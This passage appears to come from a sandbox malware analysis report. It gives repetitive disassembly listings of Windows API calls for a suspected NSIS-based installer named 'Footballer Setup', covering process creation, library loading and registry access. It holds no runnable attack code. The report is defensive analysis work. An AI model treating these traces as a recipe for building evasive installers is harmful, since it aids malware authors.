                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user\AppData\Local\sillinesses
                                                                    • API String ID: 1892508949-3064817632
                                                                    • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                    • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                    • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                    • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                                    APIs
                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                    • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405CF0
                                                                    • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00405D00
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                    • String ID: C:\
                                                                    • API String ID: 3248276644-3404278061
                                                                    • Opcode ID: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
                                                                    • Instruction ID: afdd3353ca4dad18281e5c0e52e07b41dda899da8cc80c7b0a0d0babdec36168
                                                                    • Opcode Fuzzy Hash: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
                                                                    • Instruction Fuzzy Hash: 87F0443100DF2225F622333A0C05AAF2554DE82328BAA053FFC52B12D2DA3C88138D7E
                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                    • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 004061D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: Call
                                                                    • API String ID: 3356406503-1824292864
                                                                    • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                    • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                    • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                    • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                    • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                    Strings
                                                                    • Error launching installer, xrefs: 004058B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                    • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                    • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                    • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 334405425-0
                                                                    • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                    • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                                    • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                    • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                                    APIs
                                                                      • Part of subcall function 004065FD: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00406608
                                                                      • Part of subcall function 004065FD: FindClose.KERNEL32(00000000), ref: 00406614
                                                                    • lstrlenW.KERNEL32 ref: 00402299
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                    • String ID:
                                                                    • API String ID: 1486964399-0
                                                                    • Opcode ID: 0e8315648e58b55814dc1f3c3dc6ef8becddff2acbdba340bf6f834892e6ac0b
                                                                    • Instruction ID: 6269ee181bc4fdd248ee35923937f3e1ab67e15396db9274ddd7ede6479e46a9
                                                                    • Opcode Fuzzy Hash: 0e8315648e58b55814dc1f3c3dc6ef8becddff2acbdba340bf6f834892e6ac0b
                                                                    • Instruction Fuzzy Hash: 44117071900318A6DB10EFF98E4999EB6B8AF04354F54443FB805F72D1D6B8C4419B59
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$CloseValue
                                                                    • String ID:
                                                                    • API String ID: 397863658-0
                                                                    • Opcode ID: 5a9a61952417b6bfe6b89a24e65653c5098fd890d3eefb72e287b860fa7248b6
                                                                    • Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
                                                                    • Opcode Fuzzy Hash: 5a9a61952417b6bfe6b89a24e65653c5098fd890d3eefb72e287b860fa7248b6
                                                                    • Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69
                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3356406503-0
                                                                    • Opcode ID: 30a88777c351d87c576ad82697aa8c74236b6c04a157dfa6a484cb743da54f5e
                                                                    • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                                                    • Opcode Fuzzy Hash: 30a88777c351d87c576ad82697aa8c74236b6c04a157dfa6a484cb743da54f5e
                                                                    • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                    • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                    • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                    • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                    APIs
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteValue
                                                                    • String ID:
                                                                    • API String ID: 2831762973-0
                                                                    • Opcode ID: b4ed941283cc42cbc895d58b8121f3ae351412458d2bfbbd1978ef2183ef1513
                                                                    • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                                    • Opcode Fuzzy Hash: b4ed941283cc42cbc895d58b8121f3ae351412458d2bfbbd1978ef2183ef1513
                                                                    • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                                    APIs
                                                                    • ShowWindow.USER32(00010444,?), ref: 00401587
                                                                    • ShowWindow.USER32(0001043E), ref: 0040159C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 034276f51d0b42c553a83b344e0a7361816c93116213b78b32cfce19cc20a90a
                                                                    • Instruction ID: f806313cc2b23e457bf0aacbdd07ca6dd900f465a881214a0c79a18979c994cc
                                                                    • Opcode Fuzzy Hash: 034276f51d0b42c553a83b344e0a7361816c93116213b78b32cfce19cc20a90a
                                                                    • Instruction Fuzzy Hash: 67E08637B141049BCB15CFA4ED808AE77A6EB88321324047FE502B3290CA75BD40CF38
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
